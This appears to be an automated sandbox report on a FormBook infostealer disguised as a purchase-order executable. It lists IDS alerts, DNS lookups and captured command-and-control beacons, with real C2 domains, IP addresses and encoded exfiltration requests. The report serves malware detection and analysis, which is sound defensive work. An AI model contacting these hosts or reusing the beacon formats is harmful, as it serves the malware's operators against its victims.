                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49989 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50005 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50012 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50012 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50040 -> 104.21.34.103:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 104.21.34.103:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50044 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50040 -> 104.21.34.103:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 104.21.34.103:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 47.254.140.255:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50044 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 156.251.17.224:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50048 -> 156.251.17.224:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50048 -> 156.251.17.224:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 156.251.17.224:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 104.21.34.103:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50047 -> 156.251.17.224:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50042 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50043 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50050 -> 47.254.140.255:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50051 -> 47.254.140.255:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50052 -> 47.254.140.255:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50052 -> 47.254.140.255:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.soainsaat.xyz
                Source: DNS query: www.soainsaat.xyz
                Source: DNS query: www.amayavp.xyz
                Source: DNS query: www.duwixushx.xyz
                Source: Joe Sandbox ViewIP Address: 209.74.77.107 209.74.77.107
                Source: Joe Sandbox ViewIP Address: 185.27.134.144 185.27.134.144
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C822EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00C822EE
                Source: global trafficHTTP traffic detected: GET /xxr1/?BTPDLZX=CTzPrZCB9Fii6KjTMWJ2M/WncddfpG5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM66jciILoGQdVc74SRxgXHJUi2AjDZRtSfQFA=&WnQdf=JhLPW HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.nb-shenshi.buzzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /sgdd/?BTPDLZX=n1rc2pzYlnLUqZJl2DrPSNjVvvG+B3kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZSkv0BSFGr8wnshHLEWZTEWF2XmR1RoCWC90=&WnQdf=JhLPW HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.laohub10.netConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /rq1s/?WnQdf=JhLPW&BTPDLZX=8hQq9qCyJ4Zif0sZJ+qpsVVSiE3f8un3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF1d98q0hIrZL7k5AWWxKgNnUzBpRStLOb73o= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.xcvbj.asiaConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /rum2/?BTPDLZX=xMZmeyR85UPBdQXFJZqJIEL01VnkhEfPz7pkSG2xpPpRtldOsCO9Ua+kpATSmsrk0H+UwmANflnCrdxtiygBnlxZg+0WQQuds7/7InpDF8b2KXLH9po+SKk=&WnQdf=JhLPW HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.soainsaat.xyzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /d9ku/?BTPDLZX=oAmOaC9rLcmuYnVqY4jJDWJ7glBqr3+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94K7yngZPbDkFJ2MbPrWQrwotde8x+DERdOM8=&WnQdf=JhLPW HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.amayavp.xyzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /vg0z/?BTPDLZX=75uk3ictCfC5d95gANF2nAu8q1moq+7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTGs6PncMbbDAs+z7vTlvvSa3jEJyrffOxyRk=&WnQdf=JhLPW HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.vayui.topConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /o362/?WnQdf=JhLPW&BTPDLZX=FaNItuPk5TcZ9HdSZBH/qM9rY38VGyvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqDzGT3SCCEwZiMzsN5+71dEwGtSagaXjd4i8= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.rgenerousrs.storeConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /jhb8/?BTPDLZX=0R31+Vq/Nm8msnga4XjSJ8sAfUwJuuARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmv0Pp97wC6ZYoPeW6DxktAXnOuh3ha64INvKA=&WnQdf=JhLPW HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.t91rl7.proConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /alu5/?WnQdf=JhLPW&BTPDLZX=m83uTjDkEXAXcvpZaWV1PNYda+U7jg2fMbxp9Jcjydk1OP9q/x+Uq7Puqw1bWxP8wchYD7Gqx/Fq8mp+rVpxrxuW5VDk7Vq07uTWEP/Rgr9zrLSf1ip7NM4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.learnwithus.siteConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /1jao/?WnQdf=JhLPW&BTPDLZX=wXeCFQWa9OsffQZ1KRXPZEZX8+i6d5mUhyyCbFo+uZizrpQ17AwBRErPIC2GsWEsFfVeFw/t98C8OszppSdM3wkRcNb8cvMpvLzxOiNeiMb5wrheE0z0IqI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.rafconstrutora.onlineConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /n7xy/?BTPDLZX=9kSByHmOdk8FUTJr+o8A3syTDbhMAn0rzNXDmTbYjaiqM3Vah8l/01w+tC+kGtOMFeVLDvKv+EgDTRurueNSiIvCBTHBcXkQVH4UQznoZd4uvjqdn9ipXGI=&WnQdf=JhLPW HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.7vh2wy.topConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /q0vk/?BTPDLZX=TqE1JZ2PW3JWY2uYnAavAXklIsUks6+yOAYp2neLNqkwqfDGdEjMQdAOFdDc8sxV6WeqUhb2JmW0DlQMLtnU6XPzOQdjNl3sAk02DQStC+27G1hNmCW/pJs=&WnQdf=JhLPW HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.duwixushx.xyzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /x20l/?BTPDLZX=fuPwFllnLQvzi1y5p/ZpnhRgNM4mXlCpPG7RIdaZj/0kEynSdOAf8+xad2xabD02Zo5QEVuMD42Ooe6vMAhBaOmt5mAtHSKuJTa6Be4mvNoGTYEsb86Lrhw=&WnQdf=JhLPW HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.yvcp3.infoConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficDNS traffic detected: DNS query: www.nb-shenshi.buzz
                Source: global trafficDNS traffic detected: DNS query: www.laohub10.net
                Source: global trafficDNS traffic detected: DNS query: www.xcvbj.asia
                Source: global trafficDNS traffic detected: DNS query: www.soainsaat.xyz
                Source: global trafficDNS traffic detected: DNS query: www.amayavp.xyz
                Source: global trafficDNS traffic detected: DNS query: www.vayui.top
                Source: global trafficDNS traffic detected: DNS query: www.rgenerousrs.store
                Source: global trafficDNS traffic detected: DNS query: www.t91rl7.pro
                Source: global trafficDNS traffic detected: DNS query: www.learnwithus.site
                Source: global trafficDNS traffic detected: DNS query: www.cuthethoi.online
                Source: global trafficDNS traffic detected: DNS query: www.rafconstrutora.online
                Source: global trafficDNS traffic detected: DNS query: www.7vh2wy.top
                Source: global trafficDNS traffic detected: DNS query: www.duwixushx.xyz
                Source: global trafficDNS traffic detected: DNS query: www.yvcp3.info
                Source: unknownHTTP traffic detected: POST /sgdd/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-USHost: www.laohub10.netOrigin: http://www.laohub10.netReferer: http://www.laohub10.net/sgdd/Cache-Control: no-cacheContent-Length: 204Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 MobileData Raw: 42 54 50 44 4c 5a 58 3d 71 33 44 38 31 64 48 54 67 48 57 32 6a 59 73 72 6b 77 50 4a 52 64 37 46 6c 50 47 57 48 6e 59 4c 39 47 34 63 70 6d 52 67 66 50 38 6f 4f 32 44 6e 4f 65 5a 41 49 76 79 58 48 2b 62 71 35 46 30 39 4f 72 32 55 78 73 7a 59 59 46 4c 2b 6d 59 51 42 56 62 2b 34 42 68 2f 42 45 78 64 77 73 34 39 68 70 55 33 41 44 31 4a 2b 41 32 56 4b 41 33 39 76 53 76 2b 44 64 2b 67 6a 59 37 72 31 4a 64 71 32 4d 6e 5a 56 4a 69 59 77 69 4f 36 65 39 69 46 77 39 50 64 70 78 6b 76 61 69 2b 6f 73 4d 4f 77 4c 65 72 43 51 62 46 49 61 6a 76 6b 58 62 56 48 34 76 68 65 75 2b 47 44 4d 69 71 6d 67 64 31 69 59 41 77 3d 3d Data Ascii: BTPDLZX=q3D81dHTgHW2jYsrkwPJRd7FlPGWHnYL9G4cpmRgfP8oO2DnOeZAIvyXH+bq5F09Or2UxszYYFL+mYQBVb+4Bh/BExdws49hpU3AD1J+A2VKA39vSv+Dd+gjY7r1Jdq2MnZVJiYwiO6e9iFw9Pdpxkvai+osMOwLerCQbFIajvkXbVH4vheu+GDMiqmgd1iYAw==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Dec 2024 11:49:34 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cd104a-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Dec 2024 11:50:08 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Dec 2024 11:50:10 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Dec 2024 11:50:13 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Dec 2024 11:50:16 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 04 Dec 2024 11:50:31 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-12-04T11:50:36.6409840Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 11:50:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UnGooNiaR4%2FuFTm2O4Sm6jt2AkaVja2pFOJUbf3%2FwjQfPpmP%2Fyr76jgBmlLcCWtXYzVYWqIAIX5vITbrQgjG4kkP855rgiZI7sH%2FCQcn0MFLuLMWmC%2BbvxWWI4QDBqRn"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecb94d84ee66a5c-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1592&rtt_var=796&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=742&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
